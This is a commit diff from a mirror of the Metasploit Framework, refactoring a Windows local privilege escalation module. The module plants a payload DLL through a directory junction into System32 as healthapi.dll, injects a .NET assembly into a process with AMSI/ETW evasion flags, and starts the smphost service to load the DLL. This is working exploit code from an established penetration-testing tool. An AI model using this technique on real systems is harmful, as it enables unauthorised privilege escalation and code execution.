mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Fix up code to use built in cd() and mkdir() commands, and adjust code to not overwrite datastore hash. Also use service_hash over manually starting the service.
This commit is contained in:
parent
3e52debd8b
commit
d5bb36c530
@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
include Msf::Post::Windows::Dotnet
|
||||
include Msf::Post::Windows::Services
|
||||
include Msf::Exploit::FileDropper
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
@ -157,7 +158,8 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
intermediate_dir = rand_text_alpha(10).to_s
|
||||
junction_dir = rand_text_alpha(10).to_s
|
||||
|
||||
cmd_exec("cmd.exe /C \"cd #{dir_junct_path} && mkdir #{intermediate_dir}\"")
|
||||
cd(dir_junct_path)
|
||||
mkdir(intermediate_dir)
|
||||
if !directory?("#{dir_junct_path}\\#{intermediate_dir}")
|
||||
fail_with(Failure::UnexpectedReply, 'Could not create the intermediate directory!')
|
||||
end
|
||||
@ -185,10 +187,9 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
payload_path = "C:\\Windows\\Temp\\#{rand_text_alpha(16)}.dll"
|
||||
print_status("Dropping payload dll at #{payload_path} and registering it for cleanup...")
|
||||
write_file(payload_path, generate_payload_dll)
|
||||
datastore['ARGUMENTS'] = "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}"
|
||||
register_file_for_cleanup(payload_path)
|
||||
execute_assembly(exe_path)
|
||||
cmd_exec('net start smphost')
|
||||
execute_assembly(exe_path, "#{dir_junct_path}\\#{intermediate_dir} #{junction_dir}\\Windows\\System32\\healthapi.dll #{payload_path}")
|
||||
service_start('smphost')
|
||||
register_file_for_cleanup('C:\\Windows\\System32\\healthapi.dll')
|
||||
end
|
||||
|
||||
@ -237,7 +238,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
[exploit_mem, offset]
|
||||
end
|
||||
|
||||
def execute_assembly(exe_path)
|
||||
def execute_assembly(exe_path, exe_args)
|
||||
if sysinfo.nil?
|
||||
fail_with(Failure::BadConfig, 'Session invalid')
|
||||
else
|
||||
@ -250,14 +251,13 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
process, hprocess = launch_process
|
||||
exploit_mem, offset = inject_hostclr_dll(hprocess)
|
||||
|
||||
assembly_mem = copy_assembly(exe_path, hprocess)
|
||||
assembly_mem = copy_assembly(exe_path, hprocess, exe_args)
|
||||
|
||||
print_status('Executing...')
|
||||
hprocess.thread.create(exploit_mem + offset, assembly_mem)
|
||||
|
||||
sleep(datastore['WAIT']) if datastore['WAIT'].positive?
|
||||
|
||||
if datastore['WAIT'].positive?
|
||||
sleep(datastore['WAIT'])
|
||||
read_output(process)
|
||||
end
|
||||
|
||||
@ -269,7 +269,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
print_good('Execution finished.')
|
||||
end
|
||||
|
||||
def copy_assembly(exe_path, process)
|
||||
def copy_assembly(exe_path, process, exe_args)
|
||||
print_status("Host injected. Copy assembly into #{process.pid}...")
|
||||
int_param_size = 8
|
||||
sign_flag_size = 1
|
||||
@ -278,7 +278,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
assembly_size = File.size(exe_path)
|
||||
|
||||
cln_params = ''
|
||||
cln_params << datastore['ARGUMENTS']
|
||||
cln_params << exe_args
|
||||
cln_params << "\x00"
|
||||
|
||||
payload_size = amsi_flag_size + etw_flag_size + sign_flag_size + int_param_size
|
||||
|
Loading…
Reference in New Issue
Block a user